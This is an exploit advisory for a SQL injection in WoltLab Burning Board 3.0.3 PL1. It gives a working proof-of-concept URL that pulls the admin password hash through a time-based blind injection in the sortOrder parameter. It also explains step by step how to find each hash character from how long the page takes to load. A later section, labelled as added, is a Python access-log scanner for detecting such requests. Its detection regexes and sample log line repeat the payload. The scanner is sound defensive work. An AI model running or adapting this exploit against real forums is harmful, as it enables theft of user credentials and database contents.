
woltlab303-sql.txt

Posted Feb 20, 2008
Authored by NBBN

Woltlab Burning Board version 3.0.3 PL1 suffers from a SQL injection vulnerability.

tags | exploit, sql injection
SHA-256 | b224983ea5e1209466473051b4e6e49d7d81d3ac59f525c15e928018d4918598

##############################################################################################
WoltLab Burning Board 3.0.3 PL1 SQL Injection Vulnerability by NBBN
Vendor: http://woltlab.de
##############################################################################################


::Proof of Concept
http://site.tld/wbb3/index.php?page=PMList&folderID=0&pageNo=1&sortField=isViewed&sortOrder=ASC,
(SELECT password FROM wcf1_user WHERE userID=1 AND
IF(ORD(SUBSTR(password,1,1))>55,BENCHMARK(3000000,MD5(23)),1))

An attacker has to register at the board to use this.

You can ask the database TRUE/FALSE questions. Modify 3000000 if it doesn't
work. On some MySQL versions you need to edit this query.



::Explain:

...AND IF(ORD(SUBSTR(password,1,1))>55,BENCHMARK(3000000,MD5(23)),1))

1,1 is the position in the hashed password. 55 is the character's code in the
ASCII table.

In this example we ask for the number 7 in the hash, at position 1. If the page
loads fast, you have found the true char. If not, ask for other chars ;-). If
you enter a char that is higher than the true one, the page loads fast too, so
start from 48 first and go higher.



::Vulnerability
When I found this, WBB 3.0.4 was only running at the support forums of WoltLab,
so I didn't test it, because there is no reason and I am not a cracker ;-)

WoltLab Burning Board 3.0.3 PLX
WoltLab Burning Board 3.0.2 PLX
WoltLab Burning Board 3.0.1 PLX
WoltLab Burning Board 3.0.0 PLX
Possibly WoltLab Burning Board 3.0.4 (not tested)...



Please don't use this to crack forums. Everything you do with this is at your
own risk.
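
For defenders, requests that abuse the sortOrder parameter described above stand
out in web-server access logs. The following is an added example, not part of the
original advisory: it flags log lines whose sortOrder or sortField value is not a
plain direction or column name. The allow-list, the regexes and the sample log
lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

ALLOWED_ORDER = {"ASC", "DESC"}  # assumption: the only legitimate sort directions
FIELD_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*\Z")  # assumption: plain column name
SQL_RE = re.compile(r"\b(?:benchmark|sleep)\s*\(|\bselect\b", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')  # combined log format

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Feb/2008:10:00:01 +0000] "GET /wbb3/index.php?page=PMList'
    '&folderID=0&pageNo=1&sortField=isViewed&sortOrder=ASC HTTP/1.1" 200 5120',
    '192.0.2.44 - - [20/Feb/2008:10:00:09 +0000] "GET /wbb3/index.php?page=PMList'
    '&folderID=0&pageNo=1&sortField=isViewed&sortOrder=ASC,(SELECT%20IF(1%3E0,'
    'BENCHMARK(3000000,MD5(23)),1)) HTTP/1.1" 200 5120',
    '192.0.2.10 - - [20/Feb/2008:10:00:12 +0000] "GET /wbb3/index.php?page=PMList'
    '&folderID=0&pageNo=2&sortField=isViewed&sortOrder=desc HTTP/1.1" 200 4890',
]

def check_sort_params(target):
    """Return a list of findings for one request target (path plus query)."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    findings = []
    for value in query.get("sortOrder", []):
        if value.upper() not in ALLOWED_ORDER:
            findings.append("sortOrder is not ASC/DESC")
        if SQL_RE.search(value):
            findings.append("SQL subquery or delay function in sortOrder")
    for value in query.get("sortField", []):
        if not FIELD_RE.match(value):
            findings.append("sortField is not a plain identifier")
    return findings

def scan_log(lines):
    """Yield (line_number, findings) for every flagged access-log line."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            findings = check_sort_params(match.group(1))
            if findings:
                yield number, findings

if __name__ == "__main__":
    for number, findings in scan_log(SAMPLE_LOG):
        print(f"line {number}: {'; '.join(findings)}")
```

The same allow-list check, applied in the application before the values reach the
ORDER BY clause, removes the injection point; a burst of flagged requests from one
registered account is the pattern to alert on.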





